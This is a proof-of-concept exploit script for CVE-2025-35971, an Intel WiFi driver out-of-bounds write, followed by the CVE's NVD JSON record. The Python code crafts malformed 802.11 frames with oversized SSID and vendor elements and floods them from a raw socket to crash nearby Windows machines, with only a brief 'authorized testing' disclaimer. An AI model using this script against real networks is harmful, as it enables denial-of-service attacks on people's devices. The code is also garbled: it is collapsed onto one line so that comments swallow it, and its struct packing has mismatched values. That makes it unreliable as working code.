CVE-2025-35971

# CVE-2025-35971 PoC - Intel WiFi Driver Out-of-Bounds Write # This PoC demonstrates the vulnerability concept (DoS via malformed packets) # Note: This is for educational and authorized testing purposes only import struct import socket import sys def create_malformed_wifi_frame(): """ Create a malformed WiFi management frame to trigger the out-of-bounds write in Intel WiFi driver """ # Radiotap header radiotap = struct.pack('<BBHiIBBHII', 0x00, # version 0x00, # pad 0x0a000000, # length 0, # present flags 0, # pad 0x0000, # flags 0x0000, # rate 0x0000, # channel frequency 0x0000, # channel flags 0x00000000 # antenna signal ) # Malformed IEEE 802.11 frame header # Frame Control (2 bytes) + Duration (2 bytes) + 3 addresses (18 bytes) frame_control = struct.pack('<H', 0x0080) # Management frame, To DS duration = struct.pack('<H', 0x013a) # Target BSSID (spoofed) bssid = b'\xff\xff\xff\xff\xff\xff' # Source address (attacker) src_addr = b'\x00\x11\x22\x33\x44\x55' # Destination address dst_addr = b'\x66\x77\x88\x99\xaa\xbb' # Sequence control (2 bytes) seq_ctrl = struct.pack('<H', 0x0000) # Malformed information elements - trigger buffer overflow # SSID IE with oversized length field ssid_ie = b'\x00' # SSID tag number ssid_len = struct.pack('B', 0xFF) # Malicious oversized length ssid_data = b'A' * 255 # Data that will cause OOB write # Supported Rates IE rates_ie = b'\x01\x04\x96\x9c\x12\x24' # Rates tag # Tag number 255 (vendor specific) with excessive length vendor_ie = b'\xff' + struct.pack('B', 0xFF) + (b'\x00' * 255) # Combine all elements payload = (frame_control + duration + dst_addr + bssid + src_addr + seq_ctrl + ssid_ie + ssid_len + ssid_data + rates_ie + vendor_ie) return radiotap + payload def send_malicious_frames(interface='wlan0', count=100): """ Send malformed WiFi frames to trigger vulnerability """ try: sock = socket.socket(socket.AF_PACKET, socket.SOCK_RAW, 0) sock.bind((interface, 0)) malformed_frame = create_malformed_wifi_frame() print(f"[*] Sending {count} malformed frames on {interface}") print(f"[*] Frame size: {len(malformed_frame)} bytes") for i in range(count): sock.send(malformed_frame) if i % 10 == 0: print(f"[*] Sent {i} frames...") print(f"[+] Completed sending {count} frames") sock.close() except PermissionError: print("[-] Error: Requires root privileges") sys.exit(1) except Exception as e: print(f"[-] Error: {e}") sys.exit(1) if __name__ == '__main__': print("CVE-2025-35971 PoC - Intel WiFi Driver OOB Write") print("WARNING: Use only in authorized testing environments") print("-" * 50) interface = sys.argv[1] if len(sys.argv) > 1 else 'wlan0' send_malicious_frames(interface, count=100)

{"cve": {"id": "CVE-2025-35971", "sourceIdentifier": "[email protected]", "published": "2025-11-11T17:15:51.520", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Out-of-bounds write for some Intel(R) PROSet/Wireless WiFi Software for Windows before version 23.160 within Ring 2: Device Drivers may allow a denial of service. Unprivileged software adversary with an unauthenticated user combined with a low complexity attack may enable denial of service. This result may potentially occur via adjacent access when attack requirements are not present without special internal knowledge and requires no user interaction. The potential vulnerability may impact the confidentiality (none), integrity (low) and availability (high) of the vulnerable system, resulting in subsequent system confidentiality (none), integrity (none) and availability (high) impacts."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:A/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:H/SC:N/SI:N/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.3, "baseSeverity": "HIGH", "attackVector": "ADJACENT", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "HIGH", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:C/C:N/I:L/A:H", "baseScore": 8.2, "baseSeverity": "HIGH", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 4.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-787"}]}], "references": [{"url": "https://intel.com/content/www/us/en/security-center/advisory/intel-sa-01398.html", "source": "[email protected]"}]}}